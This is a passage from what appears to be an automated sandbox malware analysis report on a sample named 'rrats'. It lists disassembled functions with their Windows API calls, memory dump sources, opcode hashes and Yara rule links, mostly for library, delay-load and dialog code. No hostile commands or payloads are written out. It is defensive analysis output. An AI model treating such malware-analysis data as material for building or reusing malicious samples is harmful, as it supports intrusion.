                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 70a640acfef662f8083a73cc77403ffc70164b952ab47a18e747d8537e916d56
                                                              • Instruction ID: 730de0e4c3629d45d0d21c6d4d8cebfffe0f1c59a2a67c81a4f5bb9175081c69
                                                              • Opcode Fuzzy Hash: 70a640acfef662f8083a73cc77403ffc70164b952ab47a18e747d8537e916d56
                                                              • Instruction Fuzzy Hash: D7D02B306010D517DF11372828757FF26068FC7324F0C0066F8855B283CF544C82B272
                                                              Function 00CBA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                                • Part of subcall function 00CBA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 9823f9a76a02dd93281216a88ea2d64a764b52b9537f2f54ae846c123885c8bf
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: E1D0C9B1210209BADF466B628C129EE7A99EB00740F048125B882D6192EEB1DA10A666
                                                              Function 00CBE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 00CBE5E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: bd0edf8d08310498af9342e4283433ef3c26fcd50ff2f67e47a70c3c3f4b8c34
                                                              • Instruction ID: 265014ab908f6dca6f72a4b85c5ac1070d6f8820e29aa84d4598f24a869597c4
                                                              • Opcode Fuzzy Hash: bd0edf8d08310498af9342e4283433ef3c26fcd50ff2f67e47a70c3c3f4b8c34
                                                              • Instruction Fuzzy Hash: 7FD012B81C43409FE712EFA99846BD973D4B724F05F900101F15DD16D5DB64C5C5D629
                                                              Function 00CBDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CB1B3E), ref: 00CBDD92
                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 629479737427c671b84254e5b9446fc1d20303cf95ff3121b3f921e12b7b3ed6
                                                              • Instruction ID: 12b5eb7eff08003f2735a32d56aced9c7f575658b36ca922171bd21c93263e1b
                                                              • Opcode Fuzzy Hash: 629479737427c671b84254e5b9446fc1d20303cf95ff3121b3f921e12b7b3ed6
                                                              • Instruction Fuzzy Hash: E8D09E31144300BADA112B51DD06F4F7AA6AB88B04F004554B289740F186729D35EB12
                                                              Function 00CA98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,00CA97BE), ref: 00CA98C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID:
                                                              • API String ID: 3081899298-0
                                                              • Opcode ID: cebf7c2ab6d668c0404fd674627ffad067f26433c6d91c5dc238aac5b697f57b
                                                              • Instruction ID: e0061b98b2a3dd43ffaf72d94aa74fb641a62122e6ec41cc26dad2d151fbc0d3
                                                              • Opcode Fuzzy Hash: cebf7c2ab6d668c0404fd674627ffad067f26433c6d91c5dc238aac5b697f57b
                                                              • Instruction Fuzzy Hash: 94C00238404246968E219B24988A1997722EE533AABB49695D079890E1C33ACE97EA11
                                                              Function 00CBE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 90348273aacda28ba6a38588ffbc1028a344ad4e3d5137bf952dec210452f108
                                                              • Instruction ID: fe7e8c9b427df1b28e24c1f43f0e3609bec4ba6047491a66248ca1622f4542c0
                                                              • Opcode Fuzzy Hash: 90348273aacda28ba6a38588ffbc1028a344ad4e3d5137bf952dec210452f108
                                                              • Instruction Fuzzy Hash: 68B012E525C201BC3504114E2C42CFB010DC0C5F10730C43FFC05C05C1E840EC006472
                                                              Function 00CBE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e54f00ca4c6172e736d577b8c4cb8dd2d958d352951ae56db0239d273e7e17df
                                                              • Instruction ID: 51d113a6830c8ce763d4780165ac93a2d714d569c59bb190c98dec31d6078a4b
                                                              • Opcode Fuzzy Hash: e54f00ca4c6172e736d577b8c4cb8dd2d958d352951ae56db0239d273e7e17df
                                                              • Instruction Fuzzy Hash: 13B012E525C201AC3504514E2C42DFB014DC0C8F10730C03FF809C02C1E840AC006532
                                                              Function 00CBE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: efd1de1b1202a61c70a18762708e2c4820896b20e64003cd24914242867076b5
                                                              • Instruction ID: 7ab3402aedabbc2ea2fa9245c16bd776c11028eb5dfa25057fd546917cf3d78b
                                                              • Opcode Fuzzy Hash: efd1de1b1202a61c70a18762708e2c4820896b20e64003cd24914242867076b5
                                                              • Instruction Fuzzy Hash: 6DB092A1258201AC2504520A2802DBA014DC085F10730C03AB809C02C1E840AC046472
                                                              Function 00CBE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                              • Instruction ID: d4f675eeeaa327df9ebf077e12d75ccae46746ee5b3912faf4c5acfddca816fe
                                                              • Opcode Fuzzy Hash: ed4baedd68a5afb1a8c8ac7eaae62bd6fe0969279a67956e79ae35dc29a3814f
                                                              • Instruction Fuzzy Hash: 26B012F125C101AC3504510F2D02DFB01CDC0C4F10B30C03FF809C02C1EC41AD016432
                                                              Function 00CBE2B4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fb235bfd657cd4d6dd46918ebb1b042cc3579b8d7da26fd5581edffa57277bae
                                                              • Instruction ID: baae11db1d63f6a3aa3c1f99fc16ff98a3e7667a73fbcbc12a95024ac9fbc70c
                                                              • Opcode Fuzzy Hash: fb235bfd657cd4d6dd46918ebb1b042cc3579b8d7da26fd5581edffa57277bae
                                                              • Instruction Fuzzy Hash: 1FB012E125C101AC3504510E6C03DFB014DC0C8F10730C43FF809C12C1E840AC406432
                                                              Function 00CBE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                              • Instruction ID: 4f64887353dc7eda4b0924be154f0a17439239bdf57bc9bebd371a9dd299a57b
                                                              • Opcode Fuzzy Hash: fe3cebdca12894b6ee72982ea4fe4268f3a3847e6e983bf0c9b37fc4f80053b1
                                                              • Instruction Fuzzy Hash: 3EB012E125D541AC3508910E2C02DFB014EC0C5F10B30C03FFC09C02C1E840EC006472
                                                              Function 00CBE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                              • Instruction ID: 6fdf30107f5f7a0ab7adbd60151e70604b03f817046244992d9388ecb2c4eabc
                                                              • Opcode Fuzzy Hash: 4d165326352d3afedb407aa3075bbdc4751377b13ef937181b442d5ef69dac19
                                                              • Instruction Fuzzy Hash: FCB012F125D641BC3548920E2C02DFB014EC0C4F10B30C13FF809C02C1E840AC446432
                                                              Function 00CBE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                              • Instruction ID: 442f000cfad36dc76575557df7f4efce01fe59498a71b9c80a474985ce7f2ae8
                                                              • Opcode Fuzzy Hash: 19fa2761a52d180a0a7a11f64c372d44a7114d3befc08254fb19400903e11c44
                                                              • Instruction Fuzzy Hash: 66B012E125C101AC3504511E2C02DFF018DC0C5F10730C03FFD09C02C1E840EC006472
                                                              Function 00CBE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                              • Instruction ID: 75cce6212252205b38927806dc2d070335edd928cf523c67bee5a5c2c3add2dc
                                                              • Opcode Fuzzy Hash: a28190b67e0b7f4ef833cf474ff84e99ee27522285030feb39c2069288e7cb10
                                                              • Instruction Fuzzy Hash: 0CB012E126D541AC3508910E2C02DFB018EC4C8F10B30C03FF80AC02C1E840AC006432
                                                              Function 00CBE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                              • Instruction ID: 17ec28fa73fb479abfc3204f2475adfe905fb9f7f975a2594d5ebf048d24b32e
                                                              • Opcode Fuzzy Hash: 2df22d4585f61ea0475a788664994510f319c6416fb5c56298a2e724da89cc8f
                                                              • Instruction Fuzzy Hash: 4DB092A1258201AC2504520A2902DBA014DC084F10730C03AB809C02C1E851AD496432
                                                              Function 00CBE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE1E3
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
